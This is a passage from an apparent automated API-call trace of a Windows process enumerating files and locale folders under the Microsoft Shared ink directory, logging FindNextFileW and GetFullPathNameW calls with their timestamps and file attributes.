ftCreationTime.dwLowDateTime=0x27da09b6, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27da09b6, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x9ee, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipsrus.xml", cAlternateFileName="")) returned 1 [0044.165] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27da09b6, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27da09b6, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa08, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipssrb.xml", cAlternateFileName="")) returned 1 [0044.165] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27dc6b13, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27dc6b13, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa24, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipssrl.xml", cAlternateFileName="")) returned 1 [0044.165] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27decc70, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27decc70, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x9d8, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipssve.xml", cAlternateFileName="")) returned 1 [0044.166] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="it-IT", cAlternateFileName="")) returned 1 [0044.166] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ja-JP", cAlternateFileName="")) returned 1 [0044.166] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b45ecf9, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x8b45ecf9, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x2b0dd120, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x14de00, dwReserved0=0x0, dwReserved1=0x0, cFileName="journal.dll", cAlternateFileName="")) returned 1 [0044.172] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ko-KR", cAlternateFileName="")) returned 1 [0044.172] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="lt-LT", cAlternateFileName="")) returned 1 [0044.172] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="lv-LV", cAlternateFileName="")) returned 1 [0044.172] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69e22d6e, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x69e22d6e, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x3188e7b0, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x1a0200, dwReserved0=0x0, dwReserved1=0x0, cFileName="micaut.dll", cAlternateFileName="")) returned 1 [0044.172] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x472c5956, ftCreationTime.dwHighDateTime=0x1ca040e, ftLastAccessTime.dwLowDateTime=0xa4945a00, ftLastAccessTime.dwHighDateTime=0x1ca0424, ftLastWriteTime.dwLowDateTime=0x9fcc4285, ftLastWriteTime.dwHighDateTime=0x1ca0425, nFileSizeHigh=0x0, nFileSizeLow=0x7c000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Ink.dll", cAlternateFileName="")) returned 1 [0044.172] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa12394d3, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa12394d3, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa125f634, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x179c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="mip.exe", cAlternateFileName="")) returned 1 [0044.172] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5ad46e47, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x5ad46e47, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x344e2230, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x609c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="mraut.dll", cAlternateFileName="")) returned 1 [0044.173] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66c00201, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x66c00201, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x34eb4c90, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0xc200, dwReserved0=0x0, dwReserved1=0x0, cFileName="mshwgst.dll", cAlternateFileName="")) returned 1 [0044.173] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x901e133e, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x901e133e, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x353c2bb0, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x105a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="mshwLatin.dll", cAlternateFileName="")) returned 1 [0044.173] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nb-NO", cAlternateFileName="")) returned 1 [0044.173] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nl-NL", cAlternateFileName="")) returned 1 [0044.173] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pl-PL", cAlternateFileName="")) returned 1 [0044.173] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0044.173] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0044.173] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ro-RO", cAlternateFileName="")) returned 1 [0044.174] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x42a795bf, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x42a795bf, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x43f1e320, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x29800, dwReserved0=0x0, dwReserved1=0x0, cFileName="rtscom.dll", cAlternateFileName="")) returned 1 [0044.174] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ru-RU", cAlternateFileName="")) returned 1 [0044.174] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a593198, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x6a593198, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0xf44c0670, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0xa9c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="ShapeCollector.exe", cAlternateFileName="")) returned 1 [0044.174] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sk-SK", cAlternateFileName="")) returned 1 [0044.174] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sl-SI", cAlternateFileName="")) returned 1 [0044.174] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sr-Latn-CS", cAlternateFileName="SR-LAT~1")) returned 1 [0044.174] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sv-SE", cAlternateFileName="")) returned 1 [0044.174] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56ef1310, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x56ef1310, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x449d3e50, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x9e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="TabIpsps.dll", cAlternateFileName="")) returned 1 [0044.175] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8bf05363, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8bf05363, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8bf05363, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x6d600, dwReserved0=0x0, dwReserved1=0x0, cFileName="tabskb.dll", cAlternateFileName="")) returned 1 [0044.175] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x45c03bb8, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x45c03bb8, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0xf8825d20, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x36c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="TabTip.exe", cAlternateFileName="")) returned 1 [0044.175] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="th-TH", cAlternateFileName="")) returned 1 [0044.175] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41bbeec8, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x41bbeec8, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x44c363f0, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x1b000, dwReserved0=0x0, dwReserved1=0x0, cFileName="TipBand.dll", cAlternateFileName="")) returned 1 [0044.175] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5d6a2945, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x5d6a2945, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x18975da0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x85000, dwReserved0=0x0, dwReserved1=0x0, cFileName="TipRes.dll", cAlternateFileName="")) returned 1 [0044.175] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3d7038f2, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x3d7038f2, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x18975da0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x3000, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll", cAlternateFileName="")) returned 1 [0044.175] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa125f634, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa125f634, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa1285794, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x130600, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipskins.dll", cAlternateFileName="")) returned 1 [0044.176] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1213373, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa1213373, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa12394d3, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x7ae00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tiptsf.dll", cAlternateFileName="")) returned 1 [0044.176] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb3dda83b, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb3dda83b, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb3dda83b, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x18c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tpcps.dll", cAlternateFileName="")) returned 1 [0044.176] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x980e725f, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x980e725f, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="tr-TR", cAlternateFileName="")) returned 1 [0044.176] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="uk-UA", cAlternateFileName="")) returned 1 [0044.176] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x98074e3f, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x98074e3f, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-CN", cAlternateFileName="")) returned 1 [0044.176] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 1 [0044.176] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0044.176] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0044.177] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1ac) returned 1 [0044.177] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1b8) returned 1 [0044.177] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\.", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA", lpFilePart=0x0) returned 0x38 [0044.177] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0044.177] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0044.177] CoTaskMemFree (pv=0x4fe370) [0044.177] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0044.177] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA", nBufferLength=0x105, lpBuffer=0x2aecdc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA", lpFilePart=0x0) returned 0x38 [0044.177] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0044.177] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA", lpFilePart=0x0) returned 0x38 [0044.177] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\", nBufferLength=0x105, lpBuffer=0x2aec80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\", lpFilePart=0x0) returned 0x39 [0044.177] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7545b2, ftLastAccessTime.dwHighDateTime=0x1ca0431, 